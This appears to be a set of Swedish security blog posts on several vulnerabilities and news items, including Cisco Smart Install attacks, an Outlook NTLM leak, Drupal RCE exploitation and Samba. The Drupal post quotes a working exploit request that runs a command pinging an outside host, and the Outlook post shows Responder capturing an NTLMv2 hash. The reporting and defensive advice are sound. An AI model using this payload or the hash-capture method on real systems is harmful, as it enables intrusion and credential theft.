Cisco Smart Install (SMI)

Amerikanska US-CERT gick i förrgår ut med en varning tillsammans med DHS, FBI och brittiska NCSC. Varningen gäller attacker som utförs mot Cisco-enheter som har funktionen Smart Install (SMI) aktiverad.

Enligt varningen så används verktyget Smart Install Exploitation Tool (SIET) som släpptes 2016 och som finns på Github. Även så pekas Ryssland ut som en aktör som står bakom dessa attacker mot amerikansk infrastruktur. Det som också är intressant är att SMI kan bl.a. användas för att ändra operativsystemet i Cisco-enheten, skapa GRE-tunnlar för mitm eller läsa av trafik.

SMI går på tcp port 4786 och så här ser statistik ut för skanningar:

Källa: ISC

Tittar vi på historiken gällande Cisco Smart Install så ser den inte bra ut:

Ciscos rekommendation gällande SMI lyder enligt följande:

port 4786 should be exposed to the “integrated branch director” (IBD) router only.

Även så har Ciscos Thalos-grupp släppt ett verktyg för att kontrollera om SMI är öppet som heter smi_check.

Uppdatering 1: Denna presentation från konferensen Zeronights som hålls i Ryssland är intressant. December 2016: https://2016.zeronights.ru/wp-content/uploads/2016/12/CiscoSmartInstall.v3.pdf

Uppdatering 2: Leif Nixon visade på att det finns många enheter på Shodan i Sverige:

Informationsläckage i Microsoft Office

Jag tog en titt på CVE-2018-0950 som är en informationsläckage-bugg i Office. Denna säkerhetsbrist åtgärdades av Microsoft för några veckor sedan och upptäcktes av Will Dormann på CERT-CC.

Buggen går ut på att du kan få Outlook att automatiskt gå ut och ladda in externt innehåll utan att användaren frågas om detta.

Följande bild förevisar detta tydligt:

Genom att skicka ett RTF-mail där ett externt OLE-objekt återfinnes så laddas detta externa OLE-objekt automatiskt in.

Och vet du vad mer detta innebär? Jo, du kan köra Responder.py och få ut NTLMv2-hashen från användaren:

[SMB] NTLMv2-SSP Client   : 192.168.153.136
[SMB] NTLMv2-SSP Username : DESKTOP-V26GAHF\test_user
[SMB] NTLMv2-SSP Hash     : test_user::DESKTOP-V26GAHF:1122334455667788:571EE693342B161C50A73D502EB49B5A:010100000000000046E1992B4BB2D301FFADACA3241B6E090000000002000A0053004D0042003100320001000A0053004D0042003100320004000A0053004D0042003100320003000A0053004D0042003100320005000A0053004D004200310032000800300030000000000000000100000000200000D3BDB30B62A8937256327776471E072C7C6DE9F4F98458D1FEA17CBBB6AFBA770A001000000000000000000000000000000000000900280063006900660073002F003100390032002E003100360038002E003100350033002E003100330038000000000000000000

Även om du applicerar patchen som släpptes av Microsoft så kvarstår problemet att du kan skicka UNC-länkar, dvs som börjar med \\.

Därav är det viktigt att blockera utgående SMB (445/tcp, 137/tcp, 139/tcp men även 137/udp och 139/udp) samt läs detta från Microsoft gällande NTLM SSO, ADV170014.

Drupal RCE nu ute

Den mycket kritiska sårbarhet som jag bloggade tidigare om som åtgärdats i Drupal har nu börjat att utnyttjas på Internet. ISC som först rapporterade om detta såg scanningar där följande mönster dök upp:

POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1
Host: <hostname>
User-Agent: python-requests/2.18.4
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Length: 162
Content-Type: application/x-www-form-urlencoded

form_id=user_register_form&_drupal_ajax=1&mail[#post_render][]=exec&mail[#type]=markup&mail[#markup]=ping <hostname>.mu6fea.ceye.io -c 1

Just denna payload försöker enbart att identifiera sårbara Drupal-installationer genom att köra en enkel ping med argumentet -c 1, dvs count 1. Även om många blockerar utgående trafik så kan DNS släppas ut genom brandväggar. Den subdomän under mu6fea.ceye.io har en wildcard-pekning och kan således unikt identifiera varje DNS-läckage och sårbar installation.

Ser man på whois-data för ceye.io så pekar namnservrarna till:

Name Server: NS1.HACKERNEWS.CC
Name Server: NS2.HACKERNEWS.CC

Vilket är en kinesisk nyhetssajt.

Rekommenderad åtgärd är att uppgradera Drupal till version 7.58 eller 8.5.1

Uppdatering: Denna one-liner kan också användas:

Ny rapport: obligatorisk IT-incidentrapportering till MSB för 2017

Igår så släppte Myndigheten för samhällsskydd och beredskap (MSB) en årsrapport gällande den obligatoriska IT-incidentrapporteringen. Denna rapport gäller för de incidenter som rapporterats under helåret 2017. Den förra rapporten som släpptes för 2016 gällde enbart April-December.

Det första jag kan utläsa från rapporten som är på 22 sidor (finns nedan) är att det finns ett stort mörkertal. Knappt en tredjedel av de som är rapporteringsskyldiga har rapporterat in något till MSB, och detta får till följd att det är svårt att ge en samlad bild de av de allvarliga it-incidenter som drabbar myndigheter.

Snittet gällande antalet rapporter per månad ligger på 23,4 i Sverige och jämför man med Estland så ligger de på 187 st per månad, dock kan det skilja åt vad som måste rapporteras mellan länderna.

Den obligatoriska rapporteringen till MSB kommer även att fortsätta även efter det att NIS-direktivet träder i kraft. Vilket gör att vissa myndigheter måste rapportera dubbelt.

Tittar vi på statistiken så har 79 st myndigheter lämnat in rapporter och den siffran var förra året på 77 st. Och MSB själva har några troliga förklaringar till varför siffran gällande rapporter är så pass låg:

  • Upphandlad extern IT-drift innan ikraftträdandet av rapporteringen. Denna är undantagen
  • Myndigheter som sätter en hög tröskel gällande vad som är en allvarlig it-incident

Och antalet incidenter inom varje incidenttyp ser ut enligt följande:

Några intressant iakttagelser från rapporteringen är följande:

  • Två incidenter som rapporterats handlar om att en angripare kommit över personuppgifter
  • Kryptotrojaner rapporterades enbart in under årets två första månader (2017)
  • 11 st försök till VD/GD-bedrägerier
  • 17 st incidenter kopplade till överbelastningsattacker
  • Det är svårt att säkerställa ett metodiskt informationssäkerhetsarbete hos externa leverantörer. MSB bedömer dock:

De incidenter som beror på dåligt upphandlade leverantörer antas minskas då Säkerhetspolisens och Försvarsmaktens mandat att ingripa vid upphandlingar som rör skyddsvärda verksamheter stärks den 1 april 2018.

  • Det finns ett behov att höja kompetensnivån avseende information- och cybersäkerhet för flera yrkeskategorier
  • Behov av ett systematiskt arbete med informations- och cybersäkerhet

Största delen av de 281 inrapporterade incidenterna har 149 (53 %) lett till hindrad tillgång till information. Och att det är så beror på att de uppmärksammas och noteras, och rapporteras därmed, i högre grad än incidenter där en antagonistisk aktör medvetet ansträngt sig för att inte lämna spår eller ge sig tillkänna tror MSB.

Här kan du ladda hem årsrapporten för it-incidentrapportering som PDF:

MSB årsrapport för obligatorisk it-incidentrapportering

Här kan du läsa vad jag skrev om den förra årsrapporten gällande obligatorisk IT-incidentrapportering till MSB:

Ett år av obligatorisk it-incidentrapportering

Biljetterna till SecurityFest är nu släppta

Biljetterna till säkerhetskonferensen SecurityFest som går av stapeln i Göteborg är nu släppta. Det datum som gäller är 1:a Juni 2018 samt lokalen som är Eriksbergshallen.

Inga talare är ännu utannonserade men däremot finns det möjlighet att gå två stycken kurser dagen innan konferensen. Kurserna är begränsade till 10 personer och de två kurserna är:

För konferensbiljett och utbildning en dag hamnar priset på 10000kr. Om du enbart vill gå på konferensen så blir priset 3125kr ink moms. Och för studenter så blir konferenspriset 1000kr.

Jag har själv inte varit på SecurityFest men tittar jag på förgående års talare så har det varit en otroligt bra line-up.

Allvarlig sårbarhet i Drupal 7 och 8

Drupals säkerhetsteam har gått ut med en förhandsvarning om en allvarlig sårbarhet i Drupal version 7 samt 8.  Drupal är ett blogg- och innehållshanteringssystem skrivet i PHP under licensen GNU General Public License.

Den 28:de Mars så släpps en säkerhetsuppdatering till Drupal. Stor risk finns att någon analyserar patchen och detta kan i sin tur leda till fjärrexekvering av kod (RCE) inom några timmar eller dygn efter att säkerhetsuppdateringen släpps.

Säkerhetsuppdateringen kommer att släppas 18:00 – 19:30 UTC den 28:de Mars 2018. Se då till att uppdatera omgående om du använder Drupal.

Även om Drupal inte längre stödjer  8.3.x samt 8.4.x-versioner så kommer just denna säkerhetspatch att stödja dessa versioner. Drupals säkerhetsteam meddelar även att ingen databasuppdatering är nödvändig.

Mer information finnes här: https://www.drupal.org/psa-2018-001

Dela filer anonymt med OnionShare

Sedan ett år tillbaka innehåller det anonyma operativsystemet Tails en intressant komponent vid namn OnionShare. OnionShare gör att du på ett enkelt sätt kan dela med dig av filer anonymt (stödjer även stora filer).

Förutom Tails så fungerar OnionShare på Mac, Linux samt Windows. Den version som skickas med Tails 3.6.1 är 0.9.2 och ser ut enligt följande:

Väljer man att ladda hem den senaste versionen till macOS som är 1.3 så är gränssnittet förbättrat med bl.a. nedladdningsräknare samt fler inställningar såsom möjligheten att skapa en ”Stealth Onion Service”, dvs en .onion-domän som inte annonseras ut till katalogtjänsterna i Tor-nätverket. Nackdelen med det är dock att förutom den url du använder för att dela en eller flera filer även måste dela en HidServAuth-sträng som ska in i torrc-konfigfilen.

Skärmdump när jag delar en fil via OnionShare v1.3 på macOS:

Och för den som besöker en URL via Tor Browser som delas ut via OnionShare, så ser det ut enligt följande:

OnionShare är utvecklat i programspråket Python av Micah Lee och återfinnes förutom i Tails på följande sajt:

Bra och tänka på är att när du startar OnionShare så startar även Tor upp i bakgrunden och ansluter till Tor-nätverket (precis som Tor Browser).

Säkerheten

Hur är det med säkerheten då? Jo, först och främst så är det relativt enkelt att göra en fingerprint på den 404-sida som presenteras om man upptäcker en OnionShare-webbserver. Även så sätter servern OnionShare i http-headern.

Men försöker en angripare forcera den sökväg som unikt genereras med två slumpmässiga ord från en ordlista med 7777 st ord så stöter man på problem. För efter 20 försök så stänger nämligen webbservern ner och visar följande meddelande hos den som delar ut filer via OnionShare:

Funktionen build_slug() som slumpar en URL-slug ser ut enligt följande:

Säkerhetsbuggar åtgärdade i Ledger

Ett antal säkerhetsbuggar har blivit åtgärdade i produkter från Ledger som används för kryptovaluta (offline wallet eller hardware wallet). En av buggarna som identifierades av den femtonåriga Saleem Rashid gör att en person som har fysisk tillgång till en enhet kan komma åt den privata nyckeln.

Saleems attack går under namnet MCU-fooling och går ut på att firmware i en av två processorer modifieras, exempelvis av en återförsäljare av enheterna. Ledger meddelar att en uppdatering till version 1.4.1 åtgärdar dessa buggar för Ledger Nano S. Till Ledger Blue finns det ännu ingen uppdatering.

Rasheed said unlike its competitors in the hardware wallet industry, Ledger includes no tamper protection seal or any other device that might warn customers that a Nano S has been physically opened or modified prior to its first use by the customer.

Även två till säkerhetsbuggar har blivit åtgärdade. Läs mer om dessa här:

  • Timothée Isnard – Oracle padding på SCP
  • Sergei Volokitin – Isolation Exploit

Hej! Det vore kul om du ville stödja Kryptera.se via Patreon >

Uppdatering: Det har hänt en hel del runt denna historien. Saleem har skrivit ett eget utmärkt blogginlägg och han har även identifierat en sårbarhet i Trezor Wallet.

Microsoft månatliga patchar för Mars

Microsoft har nu släppt de månatliga säkerhetspatcharna för Mars månad. En av de viktigaste säkerhetsfixarna är en som åtgärdar en RCE (Remote Code Execution) i CredSSP som används för bl.a. RDP (Remote Desktop). Denna sårbarhet har CVE-2018-0886 och som förmildrande faktor så måste angripare utföra MITM (man-i-mitten).

75 sårbarheter åtgärdas totalt varav 14 är kritiska och följande produkter åtgärdar Microsoft brister i:

  • Internet Explorer
  • Microsoft Edge
  • Microsoft Windows
  • Microsoft Office and Microsoft Office Services and Web Apps
  • Microsoft Exchange Server
  • ASP.NET Core
  • .NET Core
  • PowerShell Core
  • ChakraCore
  • Adobe Flash

För den som undrar så är ChakraCore den JavaScript-motor som återfinnes i webbläsaren Edge. Och vad som jag tycker är intressant är att Microsoft patchar en sårbarhet i Adobe Flash.

Uppdatering: Att Adobe Flash uppdateras beror troligtvis på att Flash numera är inbyggt i webbläsaren.

Ny sårbarhet identifierad i Samba

Samba

CVE-2018-1057 är benämningen på en ny sårbarhet som identifierats i den populära mjukvaran Samba. Samba är en mjukvara som används för att öka interoperabiliteten mellan Linux/Unix-system samt Windows.

För att citera Wikipedia:

Samba är fri programvara för Linux/Unix-system som använder SMB/CIFS-protokollet och används för att dela resurser som filer och skrivare i ett Windows-datornätverk(fil/printer-server). Samba ligger under GNU General Public License. Samba kan emulera en Windows NT4-domän och kan fungera som domänkontrollant.

Sårbarheten gäller från och med version 4.0.0 samt gäller om du kör Samba 4 AD DC.

Uppfyller du ovan kriterier så kan vilken autentiserad användare som helst ändra
andra användares lösenord över LDAP, inklusive lösenord för administrativa användare och servicekonton.

För mer information såsom workarounds se wikisidan: